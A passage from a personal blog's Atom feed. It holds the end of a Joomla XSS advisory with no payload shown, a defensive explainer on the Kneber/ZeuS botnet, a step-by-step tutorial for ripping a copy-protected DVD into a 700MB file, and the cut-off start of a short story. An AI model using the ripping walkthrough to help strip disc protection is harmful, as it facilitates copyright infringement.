src="http://3.bp.blogspot.com/_17JNeVdiZ7k/TBYIBxPjG6I/AAAAAAAAAV8/X_Ht8V6O3CQ/s400/XSS-Admin-ModuleManager.PNG" alt="" id="BLOGGER_PHOTO_ID_5482578422861601698" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/TBYIBuQrTBI/AAAAAAAAAV0/_jNX4DRuaLE/s1600/XSS-Admin-UserManager.PNG"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 290px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/TBYIBuQrTBI/AAAAAAAAAV0/_jNX4DRuaLE/s400/XSS-Admin-UserManager.PNG" alt="" id="BLOGGER_PHOTO_ID_5482578422061026322" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/TBYIBFdmxUI/AAAAAAAAAVs/nCaXpFSVpRw/s1600/XSS-Admin-ArticleManager.PNG"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 290px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/TBYIBFdmxUI/AAAAAAAAAVs/nCaXpFSVpRw/s400/XSS-Admin-ArticleManager.PNG" alt="" id="BLOGGER_PHOTO_ID_5482578411109401922" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify; font-family: trebuchet ms;"&gt;Please update your installation of Joomla! 
to the latest available stable release, which at the time of writing was 1.5.18.&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-8383913600538045730?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/8383913600538045730/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2010/06/multiple-joomla-xss-vulnerabilities-cve.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/8383913600538045730'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/8383913600538045730'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2010/06/multiple-joomla-xss-vulnerabilities-cve.html' title='Multiple Joomla! 
XSS Vulnerabilities - CVE-2010-1649'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_17JNeVdiZ7k/TBYIBxPjG6I/AAAAAAAAAV8/X_Ht8V6O3CQ/s72-c/XSS-Admin-ModuleManager.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-8319855059437867705</id><published>2010-02-22T01:54:00.000-08:00</published><updated>2010-03-10T03:10:35.303-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Kneber'/><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='zeus'/><category scheme='http://www.blogger.com/atom/ns#' term='tcpview'/><category scheme='http://www.blogger.com/atom/ns#' term='process monitor'/><category scheme='http://www.blogger.com/atom/ns#' term='evil'/><category scheme='http://www.blogger.com/atom/ns#' term='process explorer'/><category scheme='http://www.blogger.com/atom/ns#' term='bots'/><title type='text'>The Kneber Botnet</title><content type='html'>&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The term Botnet is used to refer to a collection of software robots or bots which are automated applications that infect multiple, possibly geographically dispersed, computers. These infected computers can then be controlled remotely via a central command-and-control (C&amp;amp;C) server which the botnet herder sets up. 
Botnets are used in underground criminal activities to steal credit card information, perform Distributed Denial of Service attacks, creation or misuse of SMTP mail relays for spam, click fraud, spamdexing and the theft of application serial numbers and login IDs of personal banking accounts and online mail accounts.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;While the term "botnet" can be used to refer to any group of bots, such as IRC bots, this word is generally used to refer to a collection of compromised computers (called zombie computers) running software, usually installed via drive-by downloads exploiting web browser vulnerabilities, worms, Trojan horses, or backdoors, under a common command-and-control infrastructure. This setup is remotely controlled by a Bot herder, also called as Bot master using a C&amp;amp;C via IRC channels or through Web Servers. When a botnet has become sufficiently large, criminals may try to acquire them for undisclosed but large sums of money to gain access to all the data and resulting information from the infected machines and subsequently from the networks associated with them.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The Kneber botnet, discovered by NetWitness, a company that deals with network monitoring and threat analysis solutions, is a new variant of the already massive ZeuS botnet, which has reportedly compromised 75000 machines in 2500 business worldwide. The Kneber botnet is based on the older 1.2 version of ZeuS which is given away for free. ZeuS, also known as Zbot, is readily available to buy in underground forums for as little as 700 USD. The package contains a builder that can generate a bot executable and Web server files (PHP, images, SQL templates) for use as the command and control server. 
While ZeuS is a generic back door that allows full control by an unauthorized remote user, the primary function of ZeuS is financial gain: stealing online credentials such as FTP, email, online banking, and other online passwords via keystroke logging. Zeus' current botnet is estimated to include millions of compromised computers (around 3.6 million in the United States alone). Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, and BusinessWeek.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The Kneber botnet is a relatively small botnet considering the number of compromised computers, although the number of organizations and businesses infected is quite high. The Kneber botnet uses rootkit technologies, undocumented Windows APIs and other stealth techniques to hide its presence on the infected machine. The Kneber botnet infects only Windows computers and has been known to infect Windows XP Professional SP 2 machines more than any other flavors. The explanation for this could be attributed to the nature in which machines are infected. Computers at the workplace can be infected via visits to sites that serve drive-by downloads, the URLs of which may be received via spam mails. Also, vulnerabilities in the browser (IE 6 and IE 7) and security issues in the OS itself may trigger an infection. 
No reports of Windows 7 computers being infected have been seen yet, possibly due to the use of IE 8 and the patching of critical vulnerabilities found in older versions of Windows.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Symptoms of infection may include unexplained bandwidth usage, unknown processes being created, unexplained usage of CPU and memory resources and frequent stalling of applications. The ZeuS botnet is very difficult to detect even with up-to-date antivirus software. Ironically, there are other bot families, like the SpyEye Trojan, whose installers specifically look for ZeuS, so that when one lands on a computer already infected with ZeuS it can kick ZeuS out and claim the machine for itself. Of course, the computer is still a bot, just with a different command-and-control server and bot herder. The Kneber botnet, on the other hand, is easily detected and cleaned by most antivirus programs due to its usage of the older version of ZeuS. Egress filtering and monitoring of outbound traffic at the network perimeter, between internal private networks and the Internet, may help block C&amp;amp;C traffic and detect infection early; coupled with active intrusion detection systems it may protect organizations and businesses alike. Using virtual keyboards, found on the login pages of most banking applications, or the Microsoft On-Screen Keyboard (osk.exe), when entering sensitive data on even trusted sites, will help protect user identities, financial information and data confidentiality against keystroke logging. Note that this is only a mitigation, not a cure: a bot that already has full control of the machine can still capture what the browser sends, so an infected machine should be cleaned rather than worked around. Common utilities like TCPView, Process Monitor and Process Explorer from Sysinternals (Microsoft) will help identify suspicious network connections and unexplained CPU and memory consumers, keeping in mind that a bot using rootkit techniques may hide its processes and connections from such user-mode tools. It is advisable that businesses continue to train their employees not to click untrusted links in emails or on the web and not to open suspicious attachments, while also keeping up with antivirus and operating system updates. 
Hardening the operating system goes a long way in preventing several unrelated issues as well.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-8319855059437867705?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/8319855059437867705/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2010/02/kneber-botnet.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/8319855059437867705'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/8319855059437867705'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2010/02/kneber-botnet.html' title='The Kneber Botnet'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-3625223257228792525</id><published>2009-11-20T01:26:00.000-08:00</published><updated>2009-11-20T04:27:13.691-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='torrents'/><category scheme='http://www.blogger.com/atom/ns#' term='dvdrip'/><category scheme='http://www.blogger.com/atom/ns#' term='xvid'/><category scheme='http://www.blogger.com/atom/ns#' term='700mb'/><category scheme='http://www.blogger.com/atom/ns#' term='dvd decrypter'/><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><category 
scheme='http://www.blogger.com/atom/ns#' term='axxo'/><category scheme='http://www.blogger.com/atom/ns#' term='autogk'/><category scheme='http://www.blogger.com/atom/ns#' term='movie'/><category scheme='http://www.blogger.com/atom/ns#' term='compression'/><title type='text'>The 700MB DVDrip Tutorial</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;I recently bought a copy of The Lost Symbol from Indiaplaza.in. Along with the book I got the DVD of DaVinci Code free. The site really does deliver what it promises.. Any ways coming back to the real premise of this blog post, I had not seen the movie version of The DaVinci Code and from the reviews and ratings at IMDB, I had no intentions of seeing it any sooner. Yet here I was holding a DVD of DaVinci Code in my hand. I decided to give my DVDripping skills a test. Not that you require any special skills to rip a DVD into that perfect 700 MB movie that you get on torrents. Its all there on the Internet, the tools and the tutorials.. What you will need is atleast 5 GB of free space and a bit of patience.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Note that piracy in any form is illegal, Im not sure about the scenario in India, although I would advise you to buy the DVD if you like the movie. This tutorial (or blog or article or whatever you want to call it) is strictly educational. Please try not to distribute the files generated at the end of the process.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Coming back to what this is all about. You will need two programs. One is a DVD Ripping program and the other is AutoGK. I personally use DVD Decrypter because of is ease of use. VirtualDubMod is a substitute program that can be used in place of AutoGK. 
In fact AutoGK uses VirtualDubMod to compress and create the 700 MB avi. We shall see more of them later. For now download these tools from the following links. The Internet is abundant with these tools and a simple Google search will provide you with numerous links. Where you can, prefer the project's own site over random mirrors: repackaged installers of old or discontinued tools are a common vector for bundled adware and malware, so scan whatever you download before running it:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;1. DVD Decrypter: &lt;a href="http://www.mrbass.org/dvdrip/SetupDVDDecrypter_3.5.4.0.exe"&gt;http://www.mrbass.org/dvdrip/SetupDVDDecrypter_3.5.4.0.exe&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;2. AutoGK: &lt;a href="http://www.autogk.me.uk/"&gt;http://www.autogk.me.uk&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The requirements before you begin:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;A P4 2.0 GHz or faster Windows XP and higher computer (the more the GHz the better)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;At least 1 GB of RAM&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;At least 5GB free&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;A DVD Drive (like duh..)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;DVD Decrypter&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;AutoGK&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Lots of patience (because the entire process can take about 2-3 
hours depending on the size of the movie and the chosen settings)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Install both the tools and insert the movie DVD into the DVD drive of your computer. It would be advisable to close all open programs since this process is memory and processor intensive.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;span style="font-weight: bold;"&gt;Part I [Ripping the DVD to the hard drive]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Run the DVD Decrypter program from the Desktop or the Start menu &gt; Programs&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SwaJuwBK_aI/AAAAAAAAARk/-E9RhpvXA3E/s1600/1.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 253px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SwaJuwBK_aI/AAAAAAAAARk/-E9RhpvXA3E/s400/1.PNG" alt="" id="BLOGGER_PHOTO_ID_5406159838961663394" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The program window shows DVD information like the Label and the Region Code Enhancement (RCE) protection status etc. You can change the destination directory where the ripped files will be kept by clicking on the small folder Icon in the Destination frame of the program window.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;On your right hand side of the program window, the list of files on the DVD will be shown. 
The .VOB files are the movie files and the .IFOs are information files that tell DVD players where a movie chapter begins etc. The .BUPs are backups of the .IFOs.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The DVD may contain several IFOs, but what is important is the IFO that points to the main movie. Look carefully in the list of files on the right. The IFO that has the largest sized VOBs under it is the IFO that we will be using later. In the case of my example VTS_01_0.IFO is the IFO that we will be using later since VTS_01_1.VOB, VTS_01_2.VOB etc are the main movie files (check the file size to get an idea).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;In any case let DVD Decrypter select the main movie for you. Go to Edit &gt; Select Main movie files&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJvbqvLcI/AAAAAAAAARs/jJ-gpBz3_z4/s1600/2.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 254px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJvbqvLcI/AAAAAAAAARs/jJ-gpBz3_z4/s400/2.PNG" alt="" id="BLOGGER_PHOTO_ID_5406159850678726082" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJv2zFqvI/AAAAAAAAAR0/lIBCx2plweY/s1600/3.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 253px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJv2zFqvI/AAAAAAAAAR0/lIBCx2plweY/s400/3.PNG" alt="" id="BLOGGER_PHOTO_ID_5406159857961511666" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span 
style="font-family:trebuchet ms;"&gt;Once that is done and a output folder selected, you can start the DVD Ripping process by clicking on the DVD icon on the bottom of the program window.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJwN44yhI/AAAAAAAAAR8/bO7A9C_81WM/s1600/4.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 253px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJwN44yhI/AAAAAAAAAR8/bO7A9C_81WM/s400/4.PNG" alt="" id="BLOGGER_PHOTO_ID_5406159864159848978" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Sit back and relax while DVD Decrypter does its work. The ripping process should take roundabout 10 minutes to finish.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;span style="font-weight: bold;"&gt;Part II [Making the XVid Avi from the Ripped DVD]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Once the ripping is over, close DVD Decrypter and run AutoGK.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SwaJwYzNwEI/AAAAAAAAASE/CU0px9ui07s/s1600/5.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 307px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SwaJwYzNwEI/AAAAAAAAASE/CU0px9ui07s/s400/5.PNG" alt="" id="BLOGGER_PHOTO_ID_5406159867088846914" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Click on the input file folder icon and browse to the 
DVD rip folder. Select the IFO file and click open to load the IFO.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaKOEs0dLI/AAAAAAAAASM/XkzpD4fQkmw/s1600/6.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 308px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaKOEs0dLI/AAAAAAAAASM/XkzpD4fQkmw/s400/6.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160377089389746" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Depending on the DVD a "Select PGC" window may be shown as follows. Select the Program Chain (PGC) that has a longer length. In my case PGC 1 had a length of 2 hours, 22 minutes, 46 seconds and 24 milliseconds.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaKOkRuIMI/AAAAAAAAASU/OKDwYEZhK7s/s1600/7.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 257px; height: 136px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaKOkRuIMI/AAAAAAAAASU/OKDwYEZhK7s/s400/7.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160385565663426" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Select the location of the output file by clicking on the folder icon in front of the output file text box in the main AutoGK program window. 
Type a name that you want the output file to have and click Save.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SwaKPOZ7eII/AAAAAAAAASc/VMYeVDNDCEw/s1600/8.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 307px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SwaKPOZ7eII/AAAAAAAAASc/VMYeVDNDCEw/s400/8.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160396874381442" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;In a DVD you will often find that there are multiple audio tracks, 6 channels (6ch) are better than 2chs. Make your choice of language (if applicable) and proceed to the Step 3 frame. Here you can choose the final size of the movie that will be output. The higher the size, the better the quality, but most 700 MB (1 CD size) movies are also good enough. Select a size or provide your own using the Custom Size option. 
In my case I selected English 6 ch audio track and a movie size of 700 MB (1 CD)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SwaKPS7pwEI/AAAAAAAAASk/lZU8gr7kIdQ/s1600/9.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 307px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SwaKPS7pwEI/AAAAAAAAASk/lZU8gr7kIdQ/s400/9.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160398089568322" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Click on Add job to add the current job to the programs queue and then click on Start to start the actual process.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SwaKQI5D4bI/AAAAAAAAASs/jtn7SYKNCYo/s1600/10.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 307px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SwaKQI5D4bI/AAAAAAAAASs/jtn7SYKNCYo/s400/10.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160412574212530" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Sit back and relax. You can actually go to sleep for an hour or 2. AutoGK will use VirtualDubMod and lame.exe to process the video and audio respectively. 
AutoGk will open and close several windows and it is advisable to leave the program alone till the entire process is complete and you are greeted with a Job finished log entry in the AutoGK log window.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SwaKo37WEBI/AAAAAAAAAS0/PdpPRA5avjY/s1600/11.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 307px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SwaKo37WEBI/AAAAAAAAAS0/PdpPRA5avjY/s400/11.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160837517119506" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Now go grab some popcorn, start the movie using VLC, K-Lite or your favorite movie player and enjoy!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-3625223257228792525?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/3625223257228792525/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/11/700mb-dvdrip-tutorial.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/3625223257228792525'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/3625223257228792525'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/11/700mb-dvdrip-tutorial.html' title='The 700MB DVDrip Tutorial'/><author><name>Riyaz Ahemed 
Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_17JNeVdiZ7k/SwaJuwBK_aI/AAAAAAAAARk/-E9RhpvXA3E/s72-c/1.PNG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-7302727065338950389</id><published>2009-10-01T05:40:00.000-07:00</published><updated>2009-10-01T06:44:55.574-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='delnaz'/><category scheme='http://www.blogger.com/atom/ns#' term='ranvir'/><category scheme='http://www.blogger.com/atom/ns#' term='Pain'/><category scheme='http://www.blogger.com/atom/ns#' term='rain'/><category scheme='http://www.blogger.com/atom/ns#' term='life'/><category scheme='http://www.blogger.com/atom/ns#' term='birthday'/><category scheme='http://www.blogger.com/atom/ns#' term='story'/><category scheme='http://www.blogger.com/atom/ns#' term='fiction'/><title type='text'>One Rainy Day</title><content type='html'>&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:georgia;"&gt;I wrote this a year ago.. still fresh in my memories..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Everybody loves the rain. I hate it more than god would allow me to. People also love to celebrate their birthdays with lavish parties and expensive drinks and gifts. I hate the day I was born. I didn’t always hate the falling drops nor birthdays. 
I was a normal guy, am still now, but people don’t think so.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Traveling to work in a rickety old scooter that my father had bought on his 10th Marriage Anniversary, can be a nightmare, especially when you are working in Mumbai and its pouring outside. To add salt to the injury, my father is an optimistic and refuses to accept the fact that the scooter has all the qualifications to be called a fossil. I hate traveling by the bus. You never know a bus, carrying half the population of China, may go down the several flyovers in the city. My financial capabilities limit my rickshaw travel and the only other notion is to walk and walking 6 and a half kilometers early in the morning is not my cup of tea. Not wanting to hurt my fathers spiritual sentiments attached with the antique, I still half ride, half walk to office.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;My job is a pretty plain one. Not that I’m complaining; its not what you would expect a First Class with Hons. Electronics and Telecommunications Engineer to do, but yes I love my job. Mr. Ranaut, my boss, a moron by character, comes to my cabin everyday in the morning, throws 6 or 7 files on my desk and leaves without any logical explanation. My self esteem starts draining everyday at 9 in the morning, until the angel appears. Soft spoken and always in black she comes in exactly 6 minutes after he has left. Sabrina, or more specifically Miss Sabrina, is the love of my life. Trapped under the clutches of the ill-tempered Ranaut, she is his personal secretary. She is the only other person on this planet, after my father of course, who loves my 